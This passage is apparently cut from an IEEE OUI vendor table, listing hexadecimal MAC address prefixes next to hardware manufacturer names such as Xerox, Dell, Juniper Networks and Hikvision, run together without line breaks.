PROTECH SYSTEMS CO., LTD. 0090F8 MEDIATRIX TELECOM 009010 SIMULATION LABORATORIES, INC. 0090C6 OPTIM SYSTEMS, INC. 00902E NAMCO LIMITED 00908F AUDIO CODES LTD. 0090AA INDIGO ACTIVE VISION SYSTEMS LIMITED 00905B RAYMOND AND LAE ENGINEERING 0090BC TELEMANN CO., LTD. 00900A PROTON ELECTRONIC INDUSTRIAL CO., LTD. 0090B8 ROHDE & SCHWARZ GMBH & CO. KG 0090D8 WHITECROSS SYSTEMS 0090E5 TEKNEMA, INC. 0090F4 LIGHTNING INSTRUMENTATION 0090BB TAINET COMMUNICATION SYSTEM Corp. 009090 I-BUS 00901A UNISPHERE SOLUTIONS 00905E RAULAND-BORG CORPORATION 0090AF J. MORITA MFG. CORP. 0090D5 EUPHONIX, INC. 00904A CONCUR SYSTEM TECHNOLOGIES 009034 IMAGIC, INC. 009073 GAIO TECHNOLOGY 00101C OHM TECHNOLOGIES INTL, LLC 001046 ALCORN MCBRIDE INC. 0010B7 COYOTE TECHNOLOGIES, LLC 001028 COMPUTER TECHNICA, INC. 00102C Lasat Networks A/S 0010FD COCOM A/S 001070 CARADON TREND LTD. 0010BA MARTINHO-DAVIS SYSTEMS, INC. 0010C2 WILLNET, INC. 001040 INTERMEC CORPORATION 00102E NETWORK SYSTEMS & TECHNOLOGIES PVT. LTD. 009074 ARGON NETWORKS, INC. 00903B TriEMS Research Lab, Inc. 00909F DIGI-DATA CORPORATION 009019 HERMES ELECTRONICS CO., LTD. 0010C9 MITSUBISHI ELECTRONICS LOGISTIC SUPPORT CO. 000400 LEXMARK INTERNATIONAL, INC. 0010C5 PROTOCOL TECHNOLOGIES, INC. 00101A PictureTel Corp. 001067 Ericsson 001021 ENCANTO NETWORKS, INC. 001064 DNPG, LLC 001074 ATEN INTERNATIONAL CO., LTD. 001047 ECHO ELETRIC CO. LTD. 00903F WorldCast Systems 001043 A2 CORPORATION 00104E CEOLOGIC 001005 UEC COMMERCIAL 0010B8 ISHIGAKI COMPUTER SYSTEM CO. 00108B LASERANIMATION SOLLINGER GMBH 0010C7 DATA TRANSMISSION NETWORK 0010A5 OXFORD INSTRUMENTS 0010D7 ARGOSY RESEARCH INC. 001092 NETCORE INC. 00109E AWARE, INC. 0010B0 MERIDIAN TECHNOLOGY CORP. 0004AC IBM Corp 0010B4 ATMOSPHERE NETWORKS 00E08C NEOPARADIGM LABS, INC. 00E028 APTIX CORPORATION 00E0A1 HIMA PAUL HILDEBRANDT GmbH Co. KG 00E088 LTX-Credence CORPORATION 00E0F2 ARLOTTO COMNET, INC. 00E0E1 G2 NETWORKS, INC. 00E046 BENTLY NEVADA CORP. 00E058 PHASE ONE DENMARK A/S 00E076 DEVELOPMENT CONCEPTS, INC. 00E0F8 DICNA CONTROL AB 00E07D NETRONIX, INC. 00E05D UNITEC CO., LTD. 00E05E JAPAN AVIATION ELECTRONICS INDUSTRY, LTD. 00E09D SARNOFF CORPORATION 00E07B BAY NETWORKS 00E01D WebTV NETWORKS, INC. 00E08D PRESSURE SYSTEMS, INC. 00E03D FOCON ELECTRONIC SYSTEMS A/S 00E019 ING. GIORDANO ELETTRONICA 006039 SanCom Technology, Inc. 006049 VINA TECHNOLOGIES 00608D UNIPULSE CORP. 006099 SBE, Inc. 0060B3 Z-COM, INC. 006002 SCREEN SUBTITLING SYSTEMS, LTD 0060CF ALTEON NETWORKS, INC. 006075 PENTEK, INC. 00E0D2 VERSANET COMMUNICATIONS, INC. 00E047 InFocus Corporation 00E0C3 SAKAI SYSTEM DEVELOPMENT CORP. 00E092 ADMTEK INCORPORATED 00E0FF SECURITY DYNAMICS TECHNOLOGIES, Inc. 00E033 E.E.P.D. GmbH 00E0A2 MICROSLATE INC. 00E079 A.T.N.R. 00E075 Verilink Corporation 00E02E SPC ELECTRONICS CORPORATION 00E0AB DIMAT S.A. 00E030 MELITA INTERNATIONAL CORP. 00E0AA ELECTROSONIC LTD. 00E010 HESS SB-AUTOMATENBAU GmbH 00E03E ALFATECH, INC. 00E09A Positron Inc. 006089 XATA 006021 DSC CORPORATION 0060B8 CORELIS Inc. 00609C Perkin-Elmer Incorporated 006098 HT COMMUNICATIONS 0060AD MegaChips Corporation 006055 CORNELL UNIVERSITY 006015 NET2NET CORPORATION 00604F Tattile SRL 0060E8 HITACHI COMPUTER PRODUCTS (AMERICA), INC. 0060F6 NEXTEST COMMUNICATIONS PRODUCTS, INC. 006072 VXL INSTRUMENTS, LIMITED 006051 QUALITY SEMICONDUCTOR 006092 MICRO/SYS, INC. 00609E ASC X3 - INFORMATION TECHNOLOGY STANDARDS SECRETARIATS 006010 NETWORK MACHINES, INC. 006044 LITTON/POLY-SCIENTIFIC 0060A2 NIHON UNISYS LIMITED CO. 00609D PMI FOOD EQUIPMENT GROUP 006084 DIGITAL VIDEO 00602D ALERTON TECHNOLOGIES, INC. 0060F8 Loran International Technologies Inc. 006078 POWER MEASUREMENT LTD. 006004 COMPUTADORES MODULARES SA 006036 AIT Austrian Institute of Technology GmbH 00608E HE ELECTRONICS, TECHNOLOGIE & SYSTEMTECHNIK GmbH 00606A MITSUBISHI WIRELESS COMMUNICATIONS. INC. 00601A KEITHLEY INSTRUMENTS 0060AF PACIFIC MICRO DATA, INC. 006038 Nortel Networks 00A0A6 M.I. SYSTEMS, K.K. 00A051 ANGIA COMMUNICATIONS. INC. 00A013 TELTREND LTD. 00606D DIGITAL EQUIPMENT CORP. 0060CE ACCLAIM COMMUNICATIONS 0060B9 NEC Platforms, Ltd 0060B4 GLENAYRE R&D INC. 00A01D Red Lion Controls, LP 00A0B9 EAGLE TECHNOLOGY, INC. 00A019 NEBULA CONSULTANTS, INC. 00A0ED Brooks Automation, Inc. 0060DE Kayser-Threde GmbH 0060D0 SNMP RESEARCH INCORPORATED 0060B7 CHANNELMATIC, INC. 006006 SOTEC CO., LTD 0060BA SAHARA NETWORKS, INC. 0060CA HARMONIC SYSTEMS INCORPORATED 006024 GRADIENT TECHNOLOGIES, INC. 00A038 EMAIL ELECTRONICS 00A077 FUJITSU NEXION, INC. 00A03B TOSHIN ELECTRIC CO., LTD. 00A0F3 STAUBLI 00A042 SPUR PRODUCTS CORP. 00A0C1 ORTIVUS MEDICAL AB 00A04F AMERITEC CORP. 00A0CF SOTAS, INC. 00A072 OVATION SYSTEMS LTD. 00A082 NKT ELEKTRONIK A/S 00A0F0 TORONTO MICROELECTRONICS INC. 00A0D7 KASTEN CHASE APPLIED RESEARCH 00A0F1 MTI 00A0FF TELLABS OPERATIONS, INC. 00A0E5 NHC COMMUNICATIONS 00A036 APPLIED NETWORK TECHNOLOGY 00A0D2 ALLIED TELESIS INTERNATIONAL CORPORATION 00A0D3 INSTEM COMPUTER SYSTEMS, LTD. 00A0B4 TEXAS MICROSYSTEMS, INC. 00A060 ACER PERIPHERALS, INC. 00A083 ASIMMPHONY TURKEY 00A0D0 TEN X TECHNOLOGY, INC. 00A065 Symantec Corporation 00A0A3 RELIABLE POWER METERS 00A055 Data Device Corporation 00A074 PERCEPTION TECHNOLOGY 00A0A0 COMPACT DATA, LTD. 00A029 COULTER CORPORATION 00A087 Microsemi Corporation 00A043 AMERICAN TECHNOLOGY LABS, INC. 00A0BC VIASAT, INCORPORATED 00A05B MARQUIP, INC. 00A08C MultiMedia LANs, Inc. 00A07F GSM-SYNTEL, LTD. 00A0AA SPACELABS MEDICAL 00A004 NETPOWER, INC. 00A07B DAWN COMPUTER INCORPORATION 00A05C INVENTORY CONVERSION, INC./ 00200F EBRAINS Inc 0020DF KYOSAN ELECTRIC MFG. CO., LTD. 00A09B QPSX COMMUNICATIONS, LTD. 00A000 CENTILLION NETWORKS, INC. 00A08A BROOKTROUT TECHNOLOGY, INC. 002006 GARRETT COMMUNICATIONS, INC. 002024 PACIFIC COMMUNICATION SCIENCES 0020D1 MICROCOMPUTER SYSTEMS (M) SDN. 0020CE LOGICAL DESIGN GROUP, INC. 002014 GLOBAL VIEW CO., LTD. 0020C2 TEXAS MEMORY SYSTEMS, INC. 0020F9 PARALINK NETWORKS, INC. 002092 CHESS ENGINEERING B.V. 00202B ADVANCED TELECOMMUNICATIONS MODULES, LTD. 00206B KONICA MINOLTA HOLDINGS, INC. 00207C AUTEC GMBH 002057 TITZE DATENTECHNIK GmbH 002015 ACTIS COMPUTER SA 002099 BON ELECTRIC CO., LTD. 002029 TELEPROCESSING PRODUCTS, INC. 002069 ISDN SYSTEMS CORPORATION 00208B LAPIS TECHNOLOGIES, INC. 0020E5 APEX DATA, INC. 002043 NEURON COMPANY LIMITED 002071 IBR GMBH 0020C7 AKAI Professional M.I. Corp. 002087 MEMOTEC, INC. 002004 YAMATAKE-HONEYWELL CO., LTD. 0020BC Long Reach Networks Pty Ltd 00C0C0 SHORE MICROSYSTEMS, INC. 00C00C RELIA TECHNOLGIES 00C073 XEDIA CORPORATION 00C0D4 AXON NETWORKS, INC. 00C0CD COMELTA, S.A. 0020ED GIGA-BYTE TECHNOLOGY CO., LTD. 002085 Eaton Corporation 0020CD HYBRID NETWORKS, INC. 00202E DAYSTAR DIGITAL 0020B3 Tattile SRL 002016 SHOWA ELECTRIC WIRE & CABLE CO 00204D INOVIS GMBH 00205F GAMMADATA COMPUTER GMBH 00201F BEST POWER TECHNOLOGY, INC. 0020B6 AGILE NETWORKS, INC. 0020EE GTECH CORPORATION 00204C MITRON COMPUTER PTE LTD. 002017 ORBOTECH 002093 LANDINGS TECHNOLOGY CORP. 002063 WIPRO INFOTECH LTD. 002056 NEOPRODUCTS 00C005 LIVINGSTON ENTERPRISES, INC. 00C077 DAEWOO TELECOM LTD. 00C0C8 MICRO BYTE PTY. LTD. 00C069 Axxcelera Broadband Wireless 00C090 PRAIM S.R.L. 00C0DE ZCOMM, INC. 002042 DATAMETRICS CORP. 002078 RUNTOP, INC. 00C0F3 NETWORK COMMUNICATIONS CORP. 00C067 UNITED BARCODE INDUSTRIES 00C0A3 DUAL ENTERPRISES CORPORATION 00C018 LANART CORPORATION 009D8E CARDIAC RECORDERS, INC. 00BB01 OCTOTHORPE CORP. 00C033 TELEBIT COMMUNICATIONS APS 00C013 NETRIX 00205D NANOMATIC OY 00C09B Tellabs Enterprise, Inc. 00C06B OSI PLUS CORPORATION 00C04C DEPARTMENT OF FOREIGN AFFAIRS 00C07C HIGHTECH INFORMATION 00C0B8 FRASER'S HILL LTD. 00C062 IMPULSE TECHNOLOGY 00C0EC DAUPHIN TECHNOLOGY 00C016 ELECTRONIC THEATRE CONTROLS 00C086 THE LYNK CORPORATION 004037 SEA-ILAN, INC. 00404E FLUENT, INC. 00408D THE GOODYEAR TIRE & RUBBER CO. 00C026 LANS TECHNOLOGY CO., LTD. 00C0CA ALFA, INC. 00C06C SVEC COMPUTER CORP. 0040FF TELEBIT CORPORATION 00401F COLORGRAPH LTD 0040AF DIGITAL PRODUCTS, INC. 0040F7 Polaroid Corporation 00C058 DATAEXPERT CORP. 00C0D0 RATOC SYSTEM INC. 00C0BF TECHNOLOGY CONCEPTS, LTD. 00C0BA NETVANTAGE 00C05E VARI-LITE, INC. 00C0DB IPC CORPORATION (PTE) LTD. 00C0D5 Werbeagentur Jürgen Siebert 00C063 MORNING STAR TECHNOLOGIES, INC 00C021 NETEXPRESS 00C0C1 QUAD/GRAPHICS, INC. 00C089 TELINDUS DISTRIBUTION 00C06F KOMATSU LTD. 00C0A7 SEEL LTD. 00401B PRINTER SYSTEMS CORP. 0040A3 MICROUNITY SYSTEMS ENGINEERING 0040B3 ParTech Inc. 00C0E3 OSITECH COMMUNICATIONS, INC. 00C0FE APTEC COMPUTER SYSTEMS, INC. 00C0B0 GCC TECHNOLOGIES,INC. 00C0BC TELECOM AUSTRALIA/CSSC 00C00A MICRO CRAFT 00C074 TOYODA AUTOMATIC LOOM 00C04A GROUP 2000 AG 0040F2 JANICH & KLASS COMPUTERTECHNIK 0040A2 KINGSTAR TECHNOLOGY INC. 0040DC TRITEC ELECTRONIC GMBH 004054 CONNECTION MACHINES SERVICES 004004 ICM CO. LTD. 004018 ADOBE SYSTEMS, INC. 004060 COMENDEC LTD 004056 MCM JAPAN LTD. 004067 OMNIBYTE CORPORATION 0040C3 FISCHER AND PORTER CO. 00C0D7 TAIWAN TRADING CENTER DBA 0040DA TELSPEC LTD 0040A6 Cray, Inc. 00403D Teradata Corporation 004030 GK COMPUTER 004040 RING ACCESS, INC. 008057 ADSOFT, LTD. 0080BB HUGHES LAN SYSTEMS 0040D0 MITAC INTERNATIONAL CORP. 0040AB ROLAND DG CORPORATION 0040B6 COMPUTERM CORPORATION 004046 UDC RESEARCH LIMITED 00404A WEST AUSTRALIAN DEPARTMENT 00403C FORKS, INC. 004042 N.A.T. GMBH 00407E EVERGREEN SYSTEMS, INC. 00403E RASTER OPS CORPORATION 00401D INVISIBLE SOFTWARE, INC. 0040F9 COMBINET 008054 FRONTIER TECHNOLOGIES CORP. 008053 INTELLICOM, INC. 008026 NETWORK PRODUCTS CORPORATION 0080B0 ADVANCED INFORMATION 0080FA RWT GMBH 0080FD EXSCEED CORPRATION 0080FE AZURE TECHNOLOGIES, INC. 00803C TVS ELECTRONICS LTD 008046 Tattile SRL 0040EE OPTIMEM 004051 Garbee and Garbee 00407A SOCIETE D'EXPLOITATION DU CNIT 004031 KOKUSAI ELECTRIC CO., LTD 004080 ATHENIX CORPORATION 004025 MOLECULAR DYNAMICS 0040C7 RUBY TECH CORPORATION 004052 STAR TECHNOLOGIES, INC. 0040D3 KIMPSION INTERNATIONAL CORP. 004001 Zero One Technology Co. Ltd. 004071 ATM COMPUTER GMBH 004002 PERLE SYSTEMS LIMITED 004049 Roche Diagnostics International Ltd. 004029 Compex 00409E CONCURRENT TECHNOLOGIES LTD. 00402E PRECISION SOFTWARE, INC. 00402B TRIGEM COMPUTER, INC. 008011 DIGITAL SYSTEMS INT'L. INC. 0080F1 OPUS SYSTEMS 008029 EAGLE TECHNOLOGY, INC. 008072 MICROPLEX SYSTEMS LTD. 00802F NATIONAL INSTRUMENTS CORP. 0080AD CNET TECHNOLOGY, INC. 00800E ATLANTIX CORPORATION 0040EC MIKASA SYSTEM ENGINEERING 00401A FUJI ELECTRIC CO., LTD. 0080EC SUPERCOMPUTING SOLUTIONS, INC. 0080A2 CREATIVE ELECTRONIC SYSTEMS 00804B EAGLE TECHNOLOGIES PTY.LTD. 00802C THE SAGE GROUP PLC 0080D6 NUVOTECH, INC. 00800A JAPAN COMPUTER CORP. 008027 ADAPTIVE SYSTEMS, INC. 0080FC AVATAR CORPORATION 0080E4 NORTHWEST DIGITAL SYSTEMS, INC 0080CC MICROWAVE BYPASS SYSTEMS 0080A5 SPEED INTERNATIONAL 008079 MICROBUS DESIGNS LTD. 0080C8 D-LINK SYSTEMS, INC. 008012 INTEGRATED MEASUREMENT SYSTEMS 008034 SMT GOUPIL 0080AB DUKANE NETWORK INTEGRATION 0000A5 Tattile SRL 000036 ATARI CORPORATION 0000F8 DIGITAL EQUIPMENT CORPORATION 00807B ARTEL COMMUNICATIONS CORP. 0080F6 SYNERGY MICROSYSTEMS 008078 PRACTICAL PERIPHERALS, INC. 0080B7 STELLAR COMPUTER 00007D Oracle Corporation 000096 MARCONI ELECTRONICS LTD. 00005E ICANN, IANA Department 000038 CSS LABS 00009E MARLI S.A. 000042 METIER MANAGEMENT SYSTEMS LTD. 00007F LINOTYPE-HELL AG 0000CE MEGADATA CORP. 00007B RESEARCH MACHINES 000013 CAMEX 000095 SONY TEKTRONIX CORP. 000057 SCITEX CORPORATION LTD. 0000D6 PUNCH LINE HOLDING 00000F NEXT, INC. 0000BB TRI-DATA 000060 Kontron Europe GmbH 000079 NETWORTH INCORPORATED 000091 ANRITSU CORPORATION 000075 Nortel Networks 0000ED APRIL 0000A3 NETWORK APPLICATION TECHNOLOGY 000044 CASTELLE CORPORATION 000039 TOSHIBA CORPORATION 00003C AUSPEX SYSTEMS INC. 00007E CLUSTRIX CORPORATION 0000CB COMPU-SHACK ELECTRONIC GMBH 00805C AGILIS CORPORATION 0080C5 NOVELLCO DE MEXICO 008014 ESPRIT SYSTEMS 00001A ADVANCED MICRO DEVICES 08003E CODEX CORPORATION 080040 FERRANTI COMPUTER SYS. LIMITED 08003A ORCATECH INC. 08003D CADNETIX CORPORATIONS 080038 BULL S.A.S. 08002F PRIME COMPUTER INC. 08002C BRITTON LEE INC. 08007A INDATA 080079 THE DROID WORKS 080073 TECMAR INC. 080072 XEROX CORP UNIV GRANT PROGRAM 08006A AT&T 080062 General Dynamics 08005C FOUR PHASE SYSTEMS 08005A IBM Corp 080052 INSYSTEC 08004D CORVUS SYSTEMS INC. 000085 CANON INC. 00004A ADC CODENOLL TECHNOLOGY CORP. 000012 INFORMATION TECHNOLOGY LIMITED 000040 APPLICON, INC. 00005D CS TELECOM 08008F CHIPCOM CORPORATION 00008A DATAHOUSE INFORMATION SYSTEMS 000032 Marconi plc 08006F PHILIPS APELDOORN B.V. 00006A COMPUTER CONSOLES INC. 08001E APOLLO COMPUTER INC. 080019 GENERAL ELECTRIC CORPORATION 027001 RACAL-DATACOM 080001 COMPUTERVISION CORPORATION 080005 SYMBOLICS INC. 00003D UNISYS 000008 XEROX CORPORATION 00DD07 UNGERMANN-BASS INC. 00DD0D UNGERMANN-BASS INC. 080016 BARRISTER INFO SYS CORP 000006 XEROX CORPORATION 080064 Sitasys AG 080002 BRIDGE COMMUNICATIONS INC. 08001A TIARA/ 10NET 08008B PYRAMID TECHNOLOGY CORP. 080012 BELL ATLANTIC INTEGRATED SYST. D48409 SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 080030 ROYAL MELBOURNE INST OF TECH 00000B MATRIX CORPORATION 00009B INFORMATION INTERNATIONAL, INC 08000E NCR CORPORATION 000002 XEROX CORPORATION 000003 XEROX CORPORATION 00DD09 UNGERMANN-BASS INC. 5476B2 Raisecom Technology CO., LTD 143375 Zyxel Communications Corporation 2CFEE2 Qingdao Hisense Communications Co.,Ltd. FCB2D6 CIG SHANGHAI CO LTD 18DE50 Tuya Smart Inc. 3C3332 D-Link Corporation AC4DD9 Extreme Networks, Inc. 2C3C05 Marinesync Corp C4D666 Cisco Meraki A03768 Shenzhen E-Life Intelligence Technology Co.,Ltd. 44FA66 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 847ADF FUJIAN STAR-NET COMMUNICATION CO.,LTD DCCD66 NXP Semiconductor (Tianjin) LTD. 649A63 Ring LLC 60C01E V&G Information System Co.,Ltd 102834 SALZ Automation GmbH 0008B9 Kaon Group Co., Ltd. B0FF72 IEEE Registration Authority 28EB0A Rolling Wireless S.a.r.l. Luxembourg 848A59 Hisilicon Technologies Co., Ltd 148554 Earda Technologies co Ltd 14C9CF Sigmastar Technology Ltd. 6813F3 Amazon Technologies Inc. 586861 VIASAT, INCORPORATED 4C70CC Blyott NV 6074F4 Private 302F1E SIEMENS AG 446370 LCFC(HeFei) Electronics Technology co., ltd F020FF Intel Corporate C88A9A Intel Corporate A0B339 Intel Corporate E8E07E Silicon Laboratories B0C7DE Silicon Laboratories 6CF6DA Intel Corporate C86BBC IEEE Registration Authority 1C860B Guangdong Taiying Technology Co.,Ltd 74D713 Huaqin Technology Co. LTD 2CC3E6 SHENZHEN BILIAN ELECTRONIC CO.,LTD 30600A CIG SHANGHAI CO LTD 6823F4 Shenzhen Jinlangxin Technology Co., Ltd 485541 Iskratel d.o.o. F09008 Shenzhen Skyworth Digital Technology CO., Ltd 348D52 Sichuan Tianyi Comheart Telecom Co.,LTD 90837E Fiberhome Telecommunication Technologies Co.,LTD CCB071 Fiberhome Telecommunication Technologies Co.,LTD 00C711 ITEL MOBILE LIMITED C84C78 zte corporation 802D1A zte corporation 1CC992 Honor Device Co., Ltd. 08D1F9 Espressif Inc. 34B7DA Espressif Inc. 7036B2 Focusai Corp 4CD717 Dell Inc. 0823C6 HUAWEI TECHNOLOGIES CO.,LTD 50E4E0 Aruba, a Hewlett Packard Enterprise Company 74978E Nova Labs E4BFFA Vantiva USA LLC 1C9D72 Vantiva USA LLC 3C82C0 Vantiva USA LLC 80DAC2 Vantiva USA LLC 481B40 Vantiva USA LLC B85E71 Vantiva USA LLC 400FC1 Vantiva USA LLC 107B93 Zhen Shi Information Technology (Shanghai) Co., Ltd. 0C0227 Vantiva USA LLC 14B7F8 Vantiva USA LLC 1062D0 Vantiva USA LLC F4C114 Vantiva USA LLC F83B1D Vantiva USA LLC 10C25A Vantiva USA LLC D08A91 Vantiva USA LLC 705A9E Vantiva USA LLC 88F7C7 Vantiva USA LLC 9CF86B AgiTech Distribution Limited - Linki 1071FA GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 78465C CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 4C62CD Nokia D0DD7C zte corporation 843C99 zte corporation 68E59E Cisco Systems, Inc F8E5CE Apple, Inc. B04FA6 DongGuan Ramaxel Memory Technology 4C9992 vivo Mobile Communication Co., Ltd. 14C050 GUANGDONG GENIUS TECHNOLOGY CO., LTD. 441A4C xFusion Digital Technologies Co.,Ltd. 3C52A1 TP-Link Corporation Limited 000CC8 Xytronix Research & Design, Inc. 98DA92 Vuzix Corporation 14993E Xiaomi Communications Co Ltd C493BB Beijing Xiaomi Mobile Software Co., Ltd 38F9F5 Garmin International 60BD2C Taicang T&W Electronics E89C25 ASUSTek COMPUTER INC. 74C76E RTK-TECHNOLOGIES, LLC 54DF1B Vestel Elektronik San ve Tic. A.S. 2C4C15 Juniper Networks 88A6EF IEEE Registration Authority 84F5EB zte corporation D8E72F Chipsea Technologies (Shenzhen) Corp. 045791 Shenzhenshi Xinzhongxin Technology Co.Ltd D42787 Shanghai High-Flying Electronics Technology Co., Ltd 34D4E3 Atom Power, Inc. 0C8772 FUJIAN STAR-NET COMMUNICATION CO.,LTD DC8D91 Infinix mobility limited 409A30 TECNO MOBILE LIMITED F824DB EntryPoint Networks, Inc 90F421 IEEE Registration Authority F8C4AE GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 34F043 Samsung Electronics Co.,Ltd 4C66A6 Samsung Electronics Co.,Ltd 242361 vivo Mobile Communication Co., Ltd. C4A816 eero inc. 7449D2 New H3C Technologies Co., Ltd DCD26A Hangzhou Hikvision Digital Technology Co.,Ltd. 24DCC3 Espressif Inc. 74546B hangzhou zhiyi communication co., ltd 141844 Xenon Smart Teknoloji Ltd. A06636 Intracom SA Telecom Solutions 5843AB GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 58569F Cisco Systems, Inc 142D41 Silicon Laboratories A82AD6 Arthrex Inc. B44D43 IEEE Registration Authority 782AF8 IETHCOM INFORMATION TECHNOLOGY CO., LTD. F4AAD0 OHSUNG FC48C9 Yobiiq Intelligence B.V. ACD8A7 BELLDESIGN Inc. 906D62 Cambium Networks Limited 30B29F EVIDENT CORPORATION 0833ED ASKEY COMPUTER CORP 0C298F Tesla,Inc. 20B82B Sagemcom Broadband SAS D8D45D Orbic North America E48EBB Rockwell Automation 50E538 Hangzhou Hikvision Digital Technology Co.,Ltd. 4845CF LLC Proizvodstvennaya Kompania "TransService" 8C02CD FUJIAN STAR-NET COMMUNICATION CO.,LTD 54F8F0 Tesla Inc 641C10 Texas Instruments 24BF74 Hamamatsu Photonics K.K. FC2CFD dormakaba Canada Inc. - Keyscan 4C9B63 LG Innotek 947FD8 Shenzhen Skyworth Digital Technology CO., Ltd 20898A Shenzhen Skyworth Digital Technology CO., Ltd 18AA1E Shenzhen Skyworth Digital Technology CO., Ltd C01754 Apple, Inc. C8F225 EM Microelectronic 78530D Shenzhen Skyworth Digital Technology CO., Ltd 785F36 Shenzhen Skyworth Digital Technology CO., Ltd FC7A58 Shenzhen Skyworth Digital Technology CO., Ltd BC3340 Cisco Meraki 001227 Franklin Electric Co., Inc. AC1A3D Dell Inc. E84C4A Amazon Technologies Inc. 748F4D duagon Germany GmbH 00C03A duagon Germany GmbH 2C64F6 Wu Qi Technologies,Inc. 88684B GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD F49DA7 Private E88FC4 MOBIWIRE MOBILES(NINGBO) CO.,LTD 648F3E Cisco Systems, Inc CCB6C8 Cisco Systems, Inc 6CD6E3 Cisco Systems, Inc EC2C49 NakaoLab, The University of Tokyo 246E96 Dell Inc. 34E6D7 Dell Inc. 74E6E2 Dell Inc. 24B6FD Dell Inc. 000F1F Dell Inc. 00A085 Private CC96E5 Dell Inc. 3C46A1 Ruckus Wireless ECED73 Motorola Mobility LLC, a Lenovo Company D8D090 Dell Inc. 1C721D Dell Inc. 0C29EF Dell Inc. 78AC44 Dell Inc. C03EBA Dell Inc. 18FB7B Dell Inc. 1C4024 Dell Inc. 141877 Dell Inc. E0DB55 Dell Inc. F04DA2 Dell Inc. 842B2B Dell Inc. 00065B Dell Inc. 588A5A Dell Inc. B88584 Dell Inc. E4B97A Dell Inc. 684F64 Dell Inc. 747827 Dell Inc. B07B25 Dell Inc. A02919 Dell Inc. 149ECF Dell Inc. 484D7E Dell Inc. B8AC6F Dell Inc. 00219B Dell Inc. 002170 Dell Inc. 001EC9 Dell Inc. D4AE52 Dell Inc. F8B156 Dell Inc. 1884C1 Guangzhou Shiyuan Electronic Technology Company Limited D016F0 IEEE Registration Authority B0449C Assa Abloy AB - Yale 602A1B JANCUS ECC018 Cisco Systems, Inc 748FC2 Cisco Systems, Inc 64E0AB UNION MAN TECHNOLOGY CO.,LTD 0019F0 UNION MAN TECHNOLOGY CO.,LTD A01C87 UNION MAN TECHNOLOGY CO.,LTD 40F4FD UNION MAN TECHNOLOGY CO.,LTD AC3D94 Arista Networks 68856A OuterLink Corporation E41289 topsystem GmbH AC128E Shanghai Baud Data Communication Co.,Ltd. 30E1F1 Intelbras 44A3C7 zte corporation 001D9C Rockwell Automation 08BFB8 ASUSTek COMPUTER INC. D019D3 ITEL MOBILE LIMITED CCACFE Telink Semiconductor (Shanghai) Co., Ltd. 886EDD Micronet union Technology(Chengdu)Co., Ltd. 80F3EF Meta Platforms Technologies, LLC 4C5ED3 Unisyue Technologies Co; LTD. 4C231A Extreme Networks, Inc. F40046 ON Semiconductor 1012D0 zte corporation D8B249 Huawei Device Co., Ltd. C49D08 Huawei Device Co., Ltd. 80433F Juniper Networks C42F90 Hangzhou Hikvision Digital Technology Co.,Ltd. 54C415 Hangzhou Hikvision Digital Technology Co.,Ltd. 743FC2 Hangzhou Hikvision Digital Technology Co.,Ltd. A4D5C2 Hangzhou Hikvision Digital Technology Co.,Ltd. 003052 DZS Inc. B4A382 Hangzhou Hikvision Digital Technology Co.,Ltd. 686DBC Hangzhou Hikvision Digital Technology Co.,Ltd. 08A189 Hangzhou Hikvision Digital Technology Co.,Ltd. 44A642 Hangzhou Hikvision Digital Technology Co.,Ltd. A0FF0C Hangzhou Hikvision Digital Technology Co.,Ltd. 085411 Hangzhou Hikvision Digital Technology Co.,Ltd. D824EC Plenom A/S 504594 Radisys 5C4DBF zte corporation 984744 Shenzhen Boomtech Industrial Corporation 4838B6 Auhui Taoyun Technology Co., Ltd 242730 GD Midea Air-Conditioning Equipment Co.,Ltd. 541159 Nettrix Information Industry co.LTD AC89D2 Ciena Corporation E05694 Yunhight Microelectronics BCC427 HUAWEI TECHNOLOGIES CO.,LTD B0CFCB Amazon Technologies Inc. 000356 Diebold Nixdorf 00156D Ubiquiti Inc 002722 Ubiquiti Inc DC9FDB Ubiquiti Inc 18E829 Ubiquiti Inc 0014F6 Juniper Networks 2C6BF5 Juniper Networks B0C69A Juniper Networks EC13DB Juniper Networks F4CC55 Juniper Networks 3C8AB0 Juniper Networks 3C6104 Juniper Networks F4B52F Juniper Networks 74ACB9 Ubiquiti Inc F492BF Ubiquiti Inc 68D79A Ubiquiti Inc 80711F Juniper Networks 88E0F3 Juniper Networks F8C001 Juniper Networks A8D0E5 Juniper Networks 54E032 Juniper Networks 64B708 Espressif Inc. 98C854 Chiun Mai Communication System, Inc 7017D7 Shanghai Enflame Technology Co., Ltd. A08E24 eero inc. 705464 Silicon Laboratories 8C6FB9 Silicon Laboratories B86AF1 Sagemcom Broadband SAS CC5830 Sagemcom Broadband SAS D0DD49 Juniper Networks 1C9C8C Juniper Networks 9C8ACB Juniper Networks 1039E9 Juniper Networks E8A245 Juniper Networks 840328 Juniper Networks F4BFA8 Juniper Networks C8FE6A Juniper Networks FC9643 Juniper Networks E824A6 Juniper Networks B49882 Brusa HyPower AG 0805E2 Juniper Networks 68F38E Juniper Networks EC94D5 Juniper Networks A4E11A Juniper Networks 24FC4E Juniper Networks 28A24B Juniper Networks 001DB5 Juniper Networks A4515E Juniper Networks 8828FB Juniper Networks 88E64B Juniper Networks 0C9505 The Chamberlain Group, Inc 08E6C9 Business-intelligence of Oriental Nations Corporation Ltd. 7C273C Shenzhen Yunlink Technology Co., Ltd 1C2AB0 Beijing Xiaomi Electronics Co.,Ltd 9817F1 zte corporation 4CC844 Maipu Communication Technology Co.,Ltd. 247823 Panasonic Entertainment & Communication Co., Ltd. 844693 Beijing Xiaomi Mobile Software Co., Ltd 5C7545 Wayties, Inc. 10B588 Apple, Inc. F0D31F Apple, Inc. B4AEC1 Apple, Inc. 5432C7 Apple, Inc. 58E488 Amazon Technologies Inc. D853BC Lenovo Information Products (Shenzhen)Co.,Ltd 80ACC8 Phyplus Microelectronics Limited A416C0 Apple, Inc. DC45B8 Apple, Inc. 90ECEA Apple, Inc. E4BC96 DAP B.V. 202141 Universal Electronics BV 44DF65 Beijing Xiaomi Mobile Software Co., Ltd D8031A Laird Connectivity 002BF5 BUFFALO.INC 5C1648 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 380FAD HUAWEI 